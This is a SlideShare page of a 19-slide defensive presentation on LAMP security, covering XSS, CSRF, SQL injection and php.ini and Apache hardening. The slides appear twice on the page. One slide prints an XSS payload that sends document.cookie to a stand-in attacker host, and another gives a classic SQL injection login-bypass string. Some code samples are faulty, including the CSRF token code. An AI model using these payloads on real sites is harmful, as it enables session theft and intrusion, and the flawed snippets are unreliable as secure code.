SlideShare a Scribd company logo

LAMP security practices

Download as ODP, PDF
Amit Kejriwal
Amit Kejriwal

The document discusses various LAMP security practices such as preventing XSS attacks by sanitizing user input, using prepared statements to prevent SQL injection, disabling unnecessary modules and server information, limiting file uploads and access to the file system, and write protecting configuration files. It provides examples of code and configuration settings to implement these practices.

Related slideshows

Install
InstallInstall
Install
 
Databases and MySQL
Databases and MySQLDatabases and MySQL
Databases and MySQL
 
Prod java-error
Prod java-errorProd java-error
Prod java-error
 
1 of 19
LAMP Security Practices XSS Request Forgeries SQL Injection Disable PHP, Apache, OS information Disable unnecessary modules Log PHP errors Disable/Limit file uploads DoS attack Remote Code execution Disable dangerous PHP functions Limit access to file system
XSS A hacker posts the below given code snippet in the comment section of website http://exsite.com. Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script> The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hacker's site (http://evilhacker.org):- Note that cookie data may have my login credentials which you as a hacker can use to
XSS solution All user submitted content should be filtered and all the disallowed characters should be removed In particular <, >, and all html tags should be stripped
Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
SQL Injection Ex. Input ' OR '1'='1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = '$_GET['userid']' ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = '' OR '1'='1' ” which will result in valid records getting returned from database.
SQL Injection Solution Use mysqli_real_escape_string($_GET['userid']) for all user supplied data Use prepared statements:- $statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" ); $statement->bind_param( "i", $_GET['userid'] ); $statement->execute();
Disable PHP information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 The output shows that the sites runs on PHP and the version of PHP as well Disable the information by setting expose_php=off in php.ini
Disable Server Information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) The output shows Apache server, its version, and OS Ubuntu information Disable these information by setting ServerSignature Off ServerTokens Prod in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
Disable unnecessary modules Use php -m to check list of enabled modules Disable modules like gd if not required On Ubuntu, goto folder /etc/php5/conf.d Run: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
Log PHP errors Use following to hide PHP error messages to be diaplayed to site users display_errors = Off Use following to log the PHP error messages into a log file log_errors = On error_log = /var/log/httpd/php-error.log For realtime monitoring of php error log use:- tail -f /var/log/httpd/php-error.log
Disable File Uploads If your site doesnt want file upload functionality, remove it from php.ini :- file_uploads = Off If your site wants file upload functionality, set it to only the required minimum value :- file_upload = On upload_max_size = 1M
DoS attack To avoid script taking an infinite time and bringing down the server, use following settings:- max_execution_time = 30 max_input_time = 30 memory_limit = 40M
Remote Code Execution Remote urls can be opened by PHP functions like fopen, file_get_contents, include, require These remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully. To restrict remote file opening:- allow_url_fopen = Off allow_url_include = Off
Disable Dangerous PHP functions Use following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :- disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
Limit Access to File System Use following to restrict PHP's access to parts of file system:- open_basedir="/var/www/html/" The above will not allow PHP access to parts of file system like /etc or /tmp etc.
Session file path Session files must be saved away from the web site folder. Use following to change session files location:- session.save_path="/var/lib/php/session" upload_tmp_dir="/var/lib/php/upload"
Write protect conf and application files Use chattr +i command to write protect any file chattr +i /etc/php5/php.ini chattr +i /etc/mysql/my.cnf chattr +i /etc/apache2/apache2.conf chattr +i /var/www/html/ Such files then can not be modified even by root user. Use chattr -i command to revert back the write protection
Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdf http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html

More Related Content

LAMP security practices

  • 1. LAMP Security Practices XSS Request Forgeries SQL Injection Disable PHP, Apache, OS information Disable unnecessary modules Log PHP errors Disable/Limit file uploads DoS attack Remote Code execution Disable dangerous PHP functions Limit access to file system
  • 2. XSS A hacker posts the below given code snippet in the comment section of website http://exsite.com. Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script> The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hacker's site (http://evilhacker.org):- Note that cookie data may have my login credentials which you as a hacker can use to
  • 3. XSS solution All user submitted content should be filtered and all the disallowed characters should be removed In particular <, >, and all html tags should be stripped
  • 4. Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
  • 5. Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
  • 6. SQL Injection Ex. Input ' OR '1'='1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = '$_GET['userid']' ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = '' OR '1'='1' ” which will result in valid records getting returned from database.
  • 7. SQL Injection Solution Use mysqli_real_escape_string($_GET['userid']) for all user supplied data Use prepared statements:- $statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" ); $statement->bind_param( "i", $_GET['userid'] ); $statement->execute();
  • 8. Disable PHP information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 The output shows that the sites runs on PHP and the version of PHP as well Disable the information by setting expose_php=off in php.ini
  • 9. Disable Server Information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) The output shows Apache server, its version, and OS Ubuntu information Disable these information by setting ServerSignature Off ServerTokens Prod in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
  • 10. Disable unnecessary modules Use php -m to check list of enabled modules Disable modules like gd if not required On Ubuntu, goto folder /etc/php5/conf.d Run: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
  • 11. Log PHP errors Use following to hide PHP error messages to be diaplayed to site users display_errors = Off Use following to log the PHP error messages into a log file log_errors = On error_log = /var/log/httpd/php-error.log For realtime monitoring of php error log use:- tail -f /var/log/httpd/php-error.log
  • 12. Disable File Uploads If your site doesnt want file upload functionality, remove it from php.ini :- file_uploads = Off If your site wants file upload functionality, set it to only the required minimum value :- file_upload = On upload_max_size = 1M
  • 13. DoS attack To avoid script taking an infinite time and bringing down the server, use following settings:- max_execution_time = 30 max_input_time = 30 memory_limit = 40M
  • 14. Remote Code Execution Remote urls can be opened by PHP functions like fopen, file_get_contents, include, require These remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully. To restrict remote file opening:- allow_url_fopen = Off allow_url_include = Off
  • 15. Disable Dangerous PHP functions Use following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :- disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
  • 16. Limit Access to File System Use following to restrict PHP's access to parts of file system:- open_basedir="/var/www/html/" The above will not allow PHP access to parts of file system like /etc or /tmp etc.
  • 17. Session file path Session files must be saved away from the web site folder. Use following to change session files location:- session.save_path="/var/lib/php/session" upload_tmp_dir="/var/lib/php/upload"
  • 18. Write protect conf and application files Use chattr +i command to write protect any file chattr +i /etc/php5/php.ini chattr +i /etc/mysql/my.cnf chattr +i /etc/apache2/apache2.conf chattr +i /var/www/html/ Such files then can not be modified even by root user. Use chattr -i command to revert back the write protection
  • 19. Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdf http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html